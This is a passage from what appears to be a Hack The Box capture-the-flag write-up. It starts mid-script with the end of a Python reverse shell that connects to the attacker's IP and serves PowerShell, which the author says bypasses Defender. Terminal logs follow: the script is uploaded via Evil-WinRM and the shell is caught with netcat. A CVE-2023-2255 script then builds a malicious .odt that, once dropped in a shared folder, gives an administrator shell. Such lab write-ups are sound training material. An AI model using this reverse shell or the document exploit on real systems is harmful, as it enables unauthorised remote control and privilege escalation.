s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.234",42069))
p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
*Evil-WinRM* PS C:\users\public> upload exploit.py
Info: Uploading exploit.py to C:\users\public\exploit.py
Data: 936 bytes of 936 bytes copied
Info: Upload successful!
I then confirmed that this does indeed work to bypass defender and get a reverse shell
*Evil-WinRM* PS C:\> python C:\users\public\exploit.py
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ nc -lvnp 42069
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::42069
Ncat: Listening on 0.0.0.0:42069
Ncat: Connection from 10.129.28.249.
Ncat: Connection from 10.129.28.249:60193.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\> whoami
mailing\maya
Lastly, I uploaded the exploit.odt file to the _Important Documents_ directory and after a couple seconds I got a shell as administrator and grabbed root.txt from their desktop to complete the machine.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'python C:\users\public\exploit.py' --output 'exploit.odt'
File exploit.odt has been created !
*Evil-WinRM* PS C:\Important Documents> upload /home/htb-mp-904224/Desktop/exploit.odt
Info: Uploading /home/htb-mp-904224/Desktop/exploit.odt to C:\Important Documents\exploit.odt
Data: 40688 bytes of 40688 bytes copied
Info: Upload successful!
─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ nc -lvnp 42069
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::42069
Ncat: Listening on 0.0.0.0:42069
Ncat: Connection from 10.129.28.249.
Ncat: Connection from 10.129.28.249:59317.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\users\localadmin\Desktop> type root.txt
051b6816153f6a4c2821f7eac90c15e6
Keep hacking frens, thanks for reading!
Additional Resources
Ippsec video walkthrough
0xdf Writeup
0xdf.gitlab.io